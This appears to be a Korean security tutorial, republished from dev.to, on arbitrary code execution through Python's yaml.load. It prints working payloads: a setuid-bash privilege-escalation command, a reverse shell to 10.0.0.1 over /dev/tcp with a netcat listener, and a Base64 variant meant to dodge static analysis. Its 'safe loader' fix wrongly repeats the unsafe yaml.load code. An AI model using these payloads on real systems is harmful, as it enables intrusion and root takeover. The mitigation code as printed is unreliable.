> 백엔드 개발 > 파이썬 튜토리얼 > Python에서 YAML을 사용할 때는 주의하세요! 보안 취약점이 있을 수 있음

Python에서 YAML을 사용할 때는 주의하세요! 보안 취약점이 있을 수 있음

Patricia Arquette
풀어 주다: 2025-01-03 22:15:40
원래의
687명이 탐색했습니다.

Be Careful When Using YAML in Python! There May Be Security Vulnerabilities

Python의 YAML(YAML Ain't Markup Language) 라이브러리에 특정 조건에서 임의 명령을 실행할 수 있는 취약점이 있는 것으로 확인되었습니다. 안전 로더를 지정하지 않고 yaml.load 함수를 사용하면 취약점이 발생합니다. 기본적으로 yaml.load는 악성 페이로드에 대한 공격 표면을 생성하는 임의의 Python 개체를 실행할 수 있습니다.

임의 명령 실행을 통한 악용

근본적인 위험은 역직렬화 프로세스에 있습니다. YAML 문서에 악성 페이로드가 포함된 경우 yaml.load는 포함된 지시어를 처리하여 잠재적으로 코드 실행을 유도합니다. 예를 들어 다음 스니펫을 고려해 보세요.

import yaml

filename = "example.yml"
data = open(filename, 'r').read()
yaml.load(data)  # Unsafe usage
로그인 후 복사
로그인 후 복사

여기서 yaml.load 함수는 example.yml을 제한 없이 구문 분석하므로 YAML 콘텐츠에 안전하지 않은 지시문이 포함된 경우 취약해집니다. 일반적인 익스플로잇 페이로드는 임의의 시스템 명령을 실행하도록 제작될 수 있습니다.

페이로드 예시

import yaml
from yaml import Loader, UnsafeLoader

# Malicious payload
payload = b'!!python/object/new:os.system ["cp `which bash` /tmp/bash;chown root /tmp/bash;chmod u+sx /tmp/bash"]'

# Exploitation
yaml.load(payload)
yaml.load(payload, Loader=Loader)
yaml.load(payload, Loader=UnsafeLoader)
로그인 후 복사

이러한 각 호출은 페이로드를 처리하여 /tmp/bash에 권한 있는 실행 파일이 생성됩니다. 그런 다음 이 바이너리는 높은 권한으로 실행될 수 있습니다.

/tmp/bash -p
로그인 후 복사

이는 권한이 잘못 구성되었거나 기타 약점이 있는 시스템에서 취약점이 악용될 경우 권한 상승 가능성을 보여줍니다.

리버스 쉘 공격

특히 교활한 사용 사례는 리버스 셸의 취약점을 활용하는 것입니다. 이를 통해 공격자는 대상 컴퓨터에 원격으로 액세스할 수 있습니다. 이 프로세스에는 공격자의 컴퓨터에서 리스너를 시작하고 역방향 연결을 설정하도록 설계된 YAML 문서를 작성하는 작업이 포함됩니다.

공격자의 컴퓨터에서 Netcat 수신기를 시작합니다.

nc -lvnp 1234
로그인 후 복사

대상 시스템에서 다음 Python 스크립트를 루트로 실행합니다.

import yaml

# Reverse shell payload
data = '!!python/object/new:os.system ["bash -c \"bash -i >& /dev/tcp/10.0.0.1/1234 0>&1\""]'
yaml.load(data)  # Executes the reverse shell
로그인 후 복사

이 페이로드는 대상 시스템에 공격자의 수신기에 다시 연결하도록 지시하여 실행 프로세스의 권한을 갖춘 완전한 대화형 셸을 제공합니다.

난독화를 위한 Base64 인코딩

기본 보안 제어나 필터를 우회하기 위해 페이로드를 Base64로 인코딩할 수 있습니다. 이 방법은 난독화 계층을 추가하여 잠재적으로 정적 분석 도구의 탐지를 회피합니다.

from base64 import b64decode
import yaml

# Base64-encoded payload
encoded_payload = b"ISFweXRa...YXNoIl0="  # Truncated for brevity
payload = b64decode(encoded_payload)

# Execute the payload
yaml.load(payload)
로그인 후 복사

완화 기술

전문가는 이러한 취약점을 제거하기 위해 엄격한 코딩 관행을 채택해야 합니다. 권장되는 완화 조치는 다음과 같습니다.

  1. 세이프 로더 사용: yaml.load를 yaml.safe_load로 대체하여 임의 개체의 실행을 방지합니다.

    import yaml
    
    filename = "example.yml"
    data = open(filename, 'r').read()
    yaml.load(data)  # Unsafe usage
    
    로그인 후 복사
    로그인 후 복사
  2. 입력 소스 제한: YAML 입력이 삭제되고 신뢰할 수 있는 소스에서만 생성되는지 확인하세요.

  3. 정적 분석 적용: 도구를 사용하여 코드베이스에서 안전하지 않은 yaml.load 호출을 검색합니다.

  4. 환경 강화: 악용으로 인한 영향을 최소화하기 위해 시스템 권한을 제한합니다. 예를 들어 컨테이너화된 환경을 사용하면 공격자의 권한 상승 능력이 제한됩니다.


YAML 라이브러리의 기본 동작은 Python과 같은 동적 유형 언어의 역직렬화와 관련된 위험을 보여줍니다. 이 취약점을 악용하려면 최소한의 정교함이 필요하므로 보안 애플리케이션 개발에 있어 우선순위가 높은 문제입니다. 이러한 위험을 효과적으로 완화하려면 강력한 입력 검증 및 런타임 보호 장치와 함께 안전한 코딩 방식을 채택하는 것이 필수적입니다.

위 내용은 Python에서 YAML을 사용할 때는 주의하세요! 보안 취약점이 있을 수 있음의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

원천:dev.to
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
저자별 최신 기사
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿